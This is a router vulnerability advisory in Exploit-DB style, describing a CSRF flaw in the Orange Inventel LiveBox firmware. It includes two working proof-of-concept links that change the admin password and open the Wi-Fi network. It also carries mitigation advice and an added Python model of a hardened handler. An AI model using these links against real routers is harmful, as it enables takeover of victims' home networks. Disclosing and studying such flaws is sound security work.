Vendor: LiveBox
By: BlackMamba TEAM (BM1)
CVSS: 7.5 (HIGH)
CWE: 352 (Cross Site Request Forgery)
Product Name: LiveBox
Affected Version From: Inventel - v5.08.3-sp
Affected Version To: Inventel - v5.08.3-sp
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 64bit
2016

Orange Inventel LiveBox CSRF

This router is vulnerable to Cross-Site Request Forgery: an attacker can send a crafted link or a crafted web page to the administrator and thereby change the admin password (without needing to know the old one). Other settings are affected too (SSID name, SSID security, enabling or disabling the firewall, etc.).

Mitigation:

Do not click on links whose origin you cannot verify, especially while logged in to the router's interface.

Exploit-DB raw data:

# Exploit Title: Orange Inventel LiveBox CSRF
# Google Dork: N/A
# Date: 10-24-2016
# Exploit Author: BlackMamba TEAM (BM1)
# Vendor Homepage: N/A
# Version: Inventel - v5.08.3-sp
# Tested on: Windows 7 64bit
# CVE : N/A
# Category: Hardware

1. Description
This router is vulnerable to Cross-Site Request Forgery: an attacker can send a crafted link or a crafted web page (see the PoC) to the administrator
and thereby change the admin password (without needing to know the old one).
This affects other settings too (SSID name, SSID security, enabling/disabling the firewall, ...).

2. Proof of Concept
Once this link is clicked, the admin password is changed to "blackmamba" (without the quotes):

<a href="http://192.168.1.1/configok.cgi?sysPassword=blackmamba">Cats !!!</a>

Once this link is clicked, the SSID is set to "BLACKMAMBA" with security set to NONE (open wireless network):
<a href="http://192.168.1.1/advancedboot.cgi?associateTime=10&wifiEssid=BLACKMAMBA&wifiWep=0">Dogs :D !!!</a>

3. Mitigation
This is kind of obvious, but DO NOT click on links whose origin you cannot verify, especially while connected to the router's interface.
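Added example (not part of the advisory and not vendor code): a minimal Python model of the configok.cgi password change described above, once as the handler the PoC relies on (any GET carrying sysPassword rewrites the password) and once as a hardened version that demands POST, a same-origin Origin/Referer header, a per-session synchronizer token and the current password. The in-memory ROUTER/SESSIONS state, the session and token helpers, the oldPassword and csrf_token form fields and the hardened handler itself are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# Constructed in-memory stand-ins for the router's config store and session table.
ROUTER = {"sysPassword": "admin"}
SESSIONS = {}  # session id -> per-session CSRF token (assumed design)
ROUTER_HOST = "192.168.1.1"  # LAN address used in the PoC links


def vulnerable_configok(url):
    """Models configok.cgi as the advisory describes it: a GET whose query
    carries sysPassword replaces the admin password; no token, no old password."""
    params = parse_qs(urlsplit(url).query)
    if "sysPassword" in params:
        ROUTER["sysPassword"] = params["sysPassword"][0]
        return 200
    return 400


def new_session():
    """Issues a session id and binds a fresh random CSRF token to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = secrets.token_hex(16)
    return sid


def hardened_configok(method, headers, form, session_id):
    """Hypothetical fixed handler: refuses everything a cross-site page can forge.
    Returns an HTTP-style status code."""
    if method != "POST":                       # no state change on GET
        return 405
    origin = headers.get("Origin") or headers.get("Referer", "")
    if urlsplit(origin).netloc != ROUTER_HOST:  # request must come from the router's own UI
        return 403
    expected = SESSIONS.get(session_id)
    if expected is None or not hmac.compare_digest(expected, form.get("csrf_token", "")):
        return 403                             # missing or wrong synchronizer token
    if not hmac.compare_digest(form.get("oldPassword", ""), ROUTER["sysPassword"]):
        return 403                             # current password must be presented
    if "sysPassword" not in form:
        return 400
    ROUTER["sysPassword"] = form["sysPassword"]
    return 200
```

The Origin check alone is a useful first line of defence on a LAN device because a page on another site cannot change that header; the token and old-password checks cover clients that omit Origin.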

------------------------------------------------------------------------------------------------------------------------------------------------------------
From the Moroccan team : BLACK MAMBA (by BM1)